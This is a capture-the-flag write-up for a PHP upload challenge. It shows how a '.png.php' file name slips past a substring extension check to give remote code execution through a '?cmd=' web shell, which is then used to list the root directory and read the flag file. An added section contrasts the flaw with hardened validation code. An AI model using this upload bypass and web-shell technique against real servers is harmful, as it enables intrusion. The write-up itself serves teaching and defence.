Tags: php rce web 

Rating: 1.0

# ▼▼▼Defund's Crypt(Web、120pts、304/1596=19.0%)▼▼▼

This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)

`https://crypt.2020.chall.actf.co/src.php`

```
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="https://fonts.googleapis.com/css?family=Inconsolata|Special+Elite&display=swap" rel="stylesheet">
<link rel="stylesheet" href="/style.css">
<title>Defund's Crypt</title>
</head>
<body>


<h1>Defund's Crypt<span>o</span></h1>
1000000) {
throw new RuntimeException('People can only remember so much..');
}
$finfo = new finfo(FILEINFO_MIME_TYPE);
if (false === $ext = array_search(
$finfo->file($_FILES['imgfile']['tmp_name']),
array(
'.jpg' => 'image/jpeg',
'.png' => 'image/png',
'.bmp' => 'image/bmp',
),
true
)) {
throw new RuntimeException("Your memory isn't picturesque enough to be remembered.");
}
if (strpos($_FILES["imgfile"]["name"], $ext) === false) {
throw new RuntimeException("The name of your memory doesn't seem to match its content.");
}
$bname = basename($_FILES["imgfile"]["name"]);
$fname = sprintf("%s%s", sha1_file($_FILES["imgfile"]["tmp_name"]), substr($bname, strpos($bname, ".")));
if (!move_uploaded_file(
$_FILES['imgfile']['tmp_name'],
"./memories/" . $fname
)) {
throw new RuntimeException('Your memory failed to be remembered.');
}
http_response_code(301);
header("Location: /memories/" . $fname);
} catch (RuntimeException $e) {
echo "

" . $e->getMessage() . "

";
}
}
?>

<form method="POST" action="/" autocomplete="off" spellcheck="false" enctype="multipart/form-data">

Leave a memory:


<input type="file" id="imgfile" name="imgfile">
<label for="imgfile" id="imglbl">Choose an image...</label>
<input type="submit" value="Descend">
</form>
<script>
imgfile.oninput = _ => {
imgfile.classList.add("satisfied");
imglbl.innerText = imgfile.files[0].name;
};
</script>
</body>
</html>
```

```
if (false === $ext = array_search(
$finfo->file($_FILES['imgfile']['tmp_name']),
array(
'.jpg' => 'image/jpeg',
'.png' => 'image/png',
'.bmp' => 'image/bmp',
),
true
)) {
throw new RuntimeException("Your memory isn't picturesque enough to be remembered.");
}
if (strpos($_FILES["imgfile"]["name"], $ext) === false) {
throw new RuntimeException("The name of your memory doesn't seem to match its content.");
}
```

To pass these two checks, the uploaded content must carry an image signature that `finfo` recognises (for example the PNG magic bytes, which give `image/png`; `finfo->file()` inspects the file's bytes, not the client-supplied `Content-Type`), and the file name only has to contain the matching string `.png` somewhere, because `strpos` is a substring match and never looks at the final extension. The stored name then takes everything after the first dot of the original name, so `.png.php` survives.

```
POST / HTTP/1.1
Host: crypt.2020.chall.actf.co
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrDvxOBjItkRppQlH
Content-Length: 234

------WebKitFormBoundaryrDvxOBjItkRppQlH
Content-Disposition: form-data; name="imgfile"; filename="hacker_white1.png.php"
Content-Type: image/png

?PNG

------WebKitFormBoundaryrDvxOBjItkRppQlH--
```

```
Location: /memories/0e2d1102b4a852aec56ebf7292db3400e9db253d.png.php
```
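As an added illustration (not part of the original writeup or the challenge source), the challenge's checks modelled as pure functions over the detected MIME type and the client file name, beside a hardened version; the hash and file name are the ones from the writeup, the function names are my own.

```php
<?php
// Added example, not the challenge's code: the upload checks as pure functions
// over (detected MIME type, client file name) so they run offline.

const ALLOWED = array(
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/bmp'  => 'bmp',
);

// Original logic: substring check on the name, stored extension taken from
// the FIRST dot of the client-supplied name.
function originalStoredName(string $mime, string $clientName, string $sha1): ?string {
    $ext = array_search($mime, array('.jpg' => 'image/jpeg', '.png' => 'image/png', '.bmp' => 'image/bmp'), true);
    if ($ext === false) return null;                       // content is not an image
    if (strpos($clientName, $ext) === false) return null;  // ".png" anywhere in the name passes
    $bname = basename($clientName);
    return $sha1 . substr($bname, strpos($bname, "."));    // keeps everything after the first dot
}

// Hardened logic: the stored extension comes from the detected MIME type only,
// the client name must END with that extension, and no part of the client
// name reaches the filesystem.
function hardenedStoredName(string $mime, string $clientName, string $sha1): ?string {
    if (!isset(ALLOWED[$mime])) return null;
    $canonical = ALLOWED[$mime];
    $clientExt = strtolower(pathinfo(basename($clientName), PATHINFO_EXTENSION));
    if ($clientExt === 'jpeg') $clientExt = 'jpg';
    if ($clientExt !== $canonical) return null;            // "x.png.php" ends in "php": rejected
    return $sha1 . '.' . $canonical;
}

$sha1 = '0e2d1102b4a852aec56ebf7292db3400e9db253d';        // hash from the writeup
$name = 'hacker_white1.png.php';                           // file name from the writeup
var_dump(originalStoredName('image/png', $name, $sha1));   // "...253d.png.php": served as PHP
var_dump(hardenedStoredName('image/png', $name, $sha1));   // NULL: rejected
var_dump(hardenedStoredName('image/png', 'photo.PNG', $sha1)); // "...253d.png"
```

Even with the name fixed, uploads should live in a directory the web server does not execute scripts from, so a stray extension can never turn into code execution.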

---

`https://crypt.2020.chall.actf.co/memories/0e2d1102b4a852aec56ebf7292db3400e9db253d.png.php?cmd=ls%20/`

```
?PNG ? bin boot dev etc flag.txt home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
```

---

`https://crypt.2020.chall.actf.co/memories/0e2d1102b4a852aec56ebf7292db3400e9db253d.png.php?cmd=cat%20/flag.txt`

`actf{th3_ch4ll3ng3_h4s_f4ll3n_but_th3_crypt_rem4ins}`